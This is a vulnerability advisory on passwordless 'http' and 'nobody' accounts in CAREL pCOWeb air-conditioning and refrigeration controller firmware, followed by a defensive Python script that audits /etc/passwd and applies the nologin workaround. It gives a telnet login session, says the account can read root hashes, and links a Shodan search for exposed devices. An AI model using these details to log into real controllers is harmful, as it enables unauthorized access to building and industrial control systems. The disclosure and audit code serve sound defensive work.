Title: CAREL pCOWeb firmware version 1.5.0 and lower passwordless accounts
Author: xistence ( xistence[at]0x90[.]nl )
Software link: http://ksa.carel.com/documents/10451/30816/pCOWeb_1_5_0.zip
Vendor site: http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_mercato=4&id_gamma=39&id_prodotto=350
Shodan: http://www.shodanhq.com/search?q=pCOWeb

Description:
CAREL pCOWeb is an interface used in "air-conditioning controls", "refrigeration controls" and "telemaintenance systems".

Vulnerability:
Passwordless accounts

The CAREL pCOWeb firmware version 1.5.0 and lower contains an /etc/passwd which has the following 2 passwordless accounts:

http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash

Logging in through telnet without a password is possible, and it is not possible to change or see these accounts through the web interface. The "http" user basically has access to all files (including /etc/passwd, which contains the hashes for the root user) as it is in almost every group:

$ telnet
Linux 2.4.21-rmk1 (localhost) (ttya0)

localhost login: http
No directory /usr/http/root!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[http@localhost14:35:47 /]$ id
uid=48(http) gid=48(http) groups=48(http),200(httpadmin),500(carel),80(update)

Solution (workaround):
Login with telnet and set a password or change the shell from "/bin/bash" to "/bin/nologin".

Timeline:
[*] 01-25-2013 Contacted vendor
[*] 01-25-2013 Vendor responded that they will release an updated firmware, supplied workaround
[*] 05-22-2013 No updated firmware released, public disclosure
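As an added audit example (not part of the advisory), the check below parses an /etc/passwd file and flags entries that combine an empty password field with an interactive shell, i.e. the condition the two quoted entries have and that the "/bin/nologin" workaround removes. The sample passwd content is constructed from the entries quoted above plus a root line with a placeholder hash and two already-locked accounts.

```python
"""Audit /etc/passwd for accounts that can log in with no password at all."""

# Shells that refuse an interactive login; an empty password field paired with
# one of these is not a login path (this is the advisory's second workaround).
NON_LOGIN_SHELLS = {"/bin/nologin", "/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

# Constructed sample: the two entries from the advisory, a root line with a
# placeholder hash (not a real value), and two accounts that are already locked.
SAMPLE_PASSWD = """\
root:$1$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
daemon::2:2:daemon:/sbin:/bin/nologin
sshd:x:74:74:sshd:/var/empty:/bin/false
"""


def parse_passwd(text):
    """Yield (user, password_field, uid, shell) for each well-formed passwd line."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # A malformed passwd line is itself worth a look, so fail loudly.
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        user, pw, uid, _gid, _gecos, _home, shell = fields
        yield user, pw, int(uid), shell


def passwordless_logins(text):
    """Return usernames whose password field is empty AND whose shell allows
    an interactive login. An 'x' field defers to /etc/shadow and a '!' or '*'
    field marks a locked account, so neither is flagged here."""
    return [user for user, pw, _uid, shell in parse_passwd(text)
            if pw == "" and shell not in NON_LOGIN_SHELLS]


def apply_nologin_workaround(text):
    """Return the passwd text with the shell of every flagged account replaced
    by /bin/nologin, mirroring the advisory's manual workaround."""
    flagged = set(passwordless_logins(text))
    fixed = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] in flagged:
            fields[6] = "/bin/nologin"
        fixed.append(":".join(fields))
    return "\n".join(fixed) + "\n"


if __name__ == "__main__":
    for user in passwordless_logins(SAMPLE_PASSWD):
        print(f"passwordless login shell: {user}")
```

Run it against a copy of the device's /etc/passwd (e.g. `passwordless_logins(open(path).read())`) before and after applying the workaround to confirm the two accounts no longer appear.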